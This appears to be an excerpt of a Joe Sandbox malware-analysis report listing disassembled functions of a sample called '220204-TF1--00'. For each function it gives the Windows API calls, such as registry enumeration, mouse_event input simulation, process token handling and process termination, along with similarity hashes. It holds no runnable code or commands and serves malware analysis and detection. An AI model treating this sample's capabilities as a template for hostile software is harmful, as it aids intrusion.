                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: bb80903870fe375e20a2ca63803fca3f1988cf5b09a1bbd37ce0615d501c5938
                    • Instruction ID: 1c17b2ae143e24317721a994afdfa8c1807d8b5112474af9716055f18d5ad792
                    • Opcode Fuzzy Hash: bb80903870fe375e20a2ca63803fca3f1988cf5b09a1bbd37ce0615d501c5938
                    • Instruction Fuzzy Hash: 061193B1510119BFEF159F60CC85EE77F5DEF08758F018215F604A6090C776AC21DBA4
                    Function 006A41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,006A4292,?), ref: 006A41E3
                    • GetProcAddress.KERNEL32(00000000), ref: 006A41EA
                    • EncodePointer.KERNEL32(00000000), ref: 006A41F6
                    • DecodePointer.KERNEL32(00000001,006A4292,?), ref: 006A4213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: f1c01607359b1c778ba3c161b0a8dac95cf963dbe41689194871ab55c6df349c
                    • Instruction ID: 0bd265b8c576322db4f3800e275d2d8d113a2c38e1577b38dde1b3957347a2ef
                    • Opcode Fuzzy Hash: f1c01607359b1c778ba3c161b0a8dac95cf963dbe41689194871ab55c6df349c
                    • Instruction Fuzzy Hash: 07E01AF8690348EEEF206BB4EC09B543AA5BB66706F10C525F421E55E0DFBD58D1AF08
                    Function 006A429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006A41B8), ref: 006A42B8
                    • GetProcAddress.KERNEL32(00000000), ref: 006A42BF
                    • EncodePointer.KERNEL32(00000000), ref: 006A42CA
                    • DecodePointer.KERNEL32(006A41B8), ref: 006A42E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: a6cb6ee2f712417da2001d06ce5a97aac32e4f3c9e59e46afc4e03ebf76d93ad
                    • Instruction ID: 2bbc6103a92313c8056abdd94ec8e069cc2c80e7abc594345e1a8bf7a0592e45
                    • Opcode Fuzzy Hash: a6cb6ee2f712417da2001d06ce5a97aac32e4f3c9e59e46afc4e03ebf76d93ad
                    • Instruction Fuzzy Hash: 3AE0BF7C641304EBDB209B64FC0EB443AA5B716742F20C125F001E15A0CFBC4591DA1C
                    Function 006E675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: 66ad4186d3204babbd3c42a1bb89c22eaa972b443cfecd9d02f8356ef0ff4d95
                    • Instruction ID: cdd0ac7b1b1cbe5cda04cdfa3973c6740c057debc8533a6632e83dcbcbbbcd46
                    • Opcode Fuzzy Hash: 66ad4186d3204babbd3c42a1bb89c22eaa972b443cfecd9d02f8356ef0ff4d95
                    • Instruction Fuzzy Hash: 43619A3050129A9FCF51FF21CC81EFE37AAAF55348F08461DF85A6B292DA309D42CB64
                    Function 0070046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 007010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00700038,?,?), ref: 007010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00700548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00700588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007005AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007005D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00700617
                    • RegCloseKey.ADVAPI32(00000000), ref: 00700624
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: a3f0ee32cf58d60aa6def6862a861e46155cdfd568279f4e4466e06a0cc478fd
                    • Instruction ID: d54f9ab619dcda1f9d8bc474b200bdd6b04cfc4d36660d25bc274d43d87711b4
                    • Opcode Fuzzy Hash: a3f0ee32cf58d60aa6def6862a861e46155cdfd568279f4e4466e06a0cc478fd
                    • Instruction Fuzzy Hash: 26514831108200EFCB14EB24C885E6FBBEAFF89714F044A2DF595872A1DB35E914CB96
                    Function 00705A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetMenu.USER32(?), ref: 00705A82
                    • GetMenuItemCount.USER32(00000000), ref: 00705AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00705AE1
                    • GetMenuItemID.USER32(?,?), ref: 00705B50
                    • GetSubMenu.USER32(?,?), ref: 00705B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00705BAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 432422b509df3378ec1de459b3266b621b6cc35babd35c668f54b4281b4dcc32
                    • Instruction ID: 01a5cdd4339b943eb9108de65f4ba46106744f75b507cc6fde8bc3b3e4bf366e
                    • Opcode Fuzzy Hash: 432422b509df3378ec1de459b3266b621b6cc35babd35c668f54b4281b4dcc32
                    • Instruction Fuzzy Hash: A6516D75A00615EFCB11EF64C845AAEBBF5EF48310F144559E812BB391CB78AE41CF94
                    Function 006DF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 006DF3F7
                    • VariantClear.OLEAUT32(00000013), ref: 006DF469
                    • VariantClear.OLEAUT32(00000000), ref: 006DF4C4
                    • _memmove.LIBCMT ref: 006DF4EE
                    • VariantClear.OLEAUT32(?), ref: 006DF53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006DF569
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: 1759c123a3f2841500f1cd6ff55d1b366492ed60e06286bea1bd99de0772023b
                    • Instruction ID: 58e6cadce2bf3432f6fd10550dea0fdd0251f9690e84917eedb45be54afab569
                    • Opcode Fuzzy Hash: 1759c123a3f2841500f1cd6ff55d1b366492ed60e06286bea1bd99de0772023b
                    • Instruction Fuzzy Hash: 305157B5A00209EFCB10CF58D880AAAB7F9FF4C314B15856AED59DB301D730E912CBA0
                    Function 006E26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006E2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006E2792
                    • IsMenu.USER32(00000000), ref: 006E27B2
                    • CreatePopupMenu.USER32 ref: 006E27E6
                    • GetMenuItemCount.USER32(000000FF), ref: 006E2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006E2875
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 3206457cede62461585470aefe14cf9f7205c500b010d1b2f199265013e965fa
                    • Instruction ID: c4be2f2832cbff517b2a5df22f7e1bca478aea38eec891c1efbc81d7795e743c
                    • Opcode Fuzzy Hash: 3206457cede62461585470aefe14cf9f7205c500b010d1b2f199265013e965fa
                    • Instruction Fuzzy Hash: 10519070902387DBDF24CF6AC8A8AEEBBFBBF44314F104269E4159B291D7708949CB51
                    Function 00681765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0068179A
                    • GetWindowRect.USER32(?,?), ref: 006817FE
                    • ScreenToClient.USER32(?,?), ref: 0068181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0068182C
                    • EndPaint.USER32(?,?), ref: 00681876
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: 27322765d3e02ed242e09df6fd82a33bae329744eba2fea12232c689a8b93630
                    • Instruction ID: 40801c47f470823e75b3373959360156eba83c9e65735b5f14b44c291cfcc9d5
                    • Opcode Fuzzy Hash: 27322765d3e02ed242e09df6fd82a33bae329744eba2fea12232c689a8b93630
                    • Instruction Fuzzy Hash: 9A41A0B0504300DFD710EF24CC85FBA7BEDEB4A724F044729F5948A2A1C7759846DB66
                    Function 0070B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(007467B0,00000000,00CD5738,?,?,007467B0,?,0070B862,?,?), ref: 0070B9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 0070B9F0
                    • ShowWindow.USER32(007467B0,00000000,00CD5738,?,?,007467B0,?,0070B862,?,?), ref: 0070BA50
                    • ShowWindow.USER32(00000000,00000004,?,0070B862,?,?), ref: 0070BA62
                    • EnableWindow.USER32(00000000,00000001), ref: 0070BA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0070BAA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: cf3d85842852ec6b44dc4ae88129ce2e594f866aefd21de4d89df4282c586c4b
                    • Instruction ID: 02016aae7a4b81485dfba5c58e0468c3f64f3ea303dd9223eac1b52d1575be75
                    • Opcode Fuzzy Hash: cf3d85842852ec6b44dc4ae88129ce2e594f866aefd21de4d89df4282c586c4b
                    • Instruction Fuzzy Hash: EA414174600241EFDB26CF28C489B957BE1FF05714F1883B9EA488F6E2C739A945CB61
                    Function 006F73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,006F5134,?,?,00000000,00000001), ref: 006F73BF
                      • Part of subcall function 006F3C94: GetWindowRect.USER32(?,?), ref: 006F3CA7
                    • GetDesktopWindow.USER32 ref: 006F73E9
                    • GetWindowRect.USER32(00000000), ref: 006F73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006F7422
                      • Part of subcall function 006E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006E555E
                    • GetCursorPos.USER32(?), ref: 006F744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006F74AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 6646d4ed0eead4754c62efeba2fa1e996c5fdcb6b1d092c589ed28ee87cdaf69
                    • Instruction ID: 7c1e56b4d6f09f98e3ced9e02947dc9e5bc2b526d856a328a922e6322db5bbe4
                    • Opcode Fuzzy Hash: 6646d4ed0eead4754c62efeba2fa1e996c5fdcb6b1d092c589ed28ee87cdaf69
                    • Instruction Fuzzy Hash: 4831E472509309ABD720DF14DC49FABBBEAFF88314F004A19F58997191CB34E909CB96
                    Function 006D8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006D85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006D8608
                      • Part of subcall function 006D85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006D8612
                      • Part of subcall function 006D85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006D8621
                      • Part of subcall function 006D85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006D8628
                      • Part of subcall function 006D85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006D863E
                    • GetLengthSid.ADVAPI32(?,00000000,006D8977), ref: 006D8DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006D8DB8
                    • HeapAlloc.KERNEL32(00000000), ref: 006D8DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 006D8DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,006D8977), ref: 006D8DEC
                    • HeapFree.KERNEL32(00000000), ref: 006D8DF3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 3008561057-0
                    • Opcode ID: 2079e0c1f18685f5160fca0289a2770d32d7496156dc778fb735394bb5e82044
                    • Instruction ID: 0cdb53129ff810b185e9fd4e72d2efe09c9e8393613ad913d1f8d8c60065789c
                    • Opcode Fuzzy Hash: 2079e0c1f18685f5160fca0289a2770d32d7496156dc778fb735394bb5e82044
                    • Instruction Fuzzy Hash: 8C119D71901605EFDB21DF64DC09BAEB77BEF55315F10812AE885D7390CB359900CB64
                    Function 006D8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006D8B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 006D8B31
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006D8B40
                    • CloseHandle.KERNEL32(00000004), ref: 006D8B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006D8B7A
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 006D8B8E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: f1d0e8cd32d31837099513fa97d2d28ec9688a1fffdc50c754061c32138ca8fb
                    • Instruction ID: ca8502c1d387cb9aa9e3720ab8489ac42b3dedb15169f2a71559f0018fe611cc
                    • Opcode Fuzzy Hash: f1d0e8cd32d31837099513fa97d2d28ec9688a1fffdc50c754061c32138ca8fb
                    • Instruction Fuzzy Hash: 6C115CB2500209EFDF118FA4DD49FDE7BA9EF08704F048166FE04A2260CB759D609B61
                    Function 0070C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0068134D
                      • Part of subcall function 006812F3: SelectObject.GDI32(?,00000000), ref: 0068135C
                      • Part of subcall function 006812F3: BeginPath.GDI32(?), ref: 00681373
                      • Part of subcall function 006812F3: SelectObject.GDI32(?,00000000), ref: 0068139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0070C1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 0070C1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0070C1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 0070C1F6
                    • EndPath.GDI32(00000000), ref: 0070C206
                    • StrokePath.GDI32(00000000), ref: 0070C216
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: c4b2c399bbe24222bd1a1d6fedb255b6cc611fcb1eff424bb3257a300d9e9c4e
                    • Instruction ID: 0a61463cb21ee4cb5631edc2ce3692875a587aaed61eb48ce46e117cf4d46b5c
                    • Opcode Fuzzy Hash: c4b2c399bbe24222bd1a1d6fedb255b6cc611fcb1eff424bb3257a300d9e9c4e
                    • Instruction Fuzzy Hash: DA11097640010CFFDB129F90DC88FAA7FADEB09354F048122FA188A5A1C7759E95DBA4
                    Function 006A03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006A03D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 006A03DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006A03E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006A03F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 006A03F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006A0401
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 5455f38710dbcff0f48f6afaf41e62d25ee6c5cc0e73bdec273a16a70135fe3b
                    • Instruction ID: 02263870e832b8fb894098485bbe17b4d4e25c7dd08a9925638d338780a2bcb5
                    • Opcode Fuzzy Hash: 5455f38710dbcff0f48f6afaf41e62d25ee6c5cc0e73bdec273a16a70135fe3b
                    • Instruction Fuzzy Hash: 7B016CB0901759BDE3008F5A8C85B52FFA8FF19354F00421BE15C47941C7F5A864CBE5
                    Function 006E568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006E569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006E56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 006E56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006E56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006E56D9
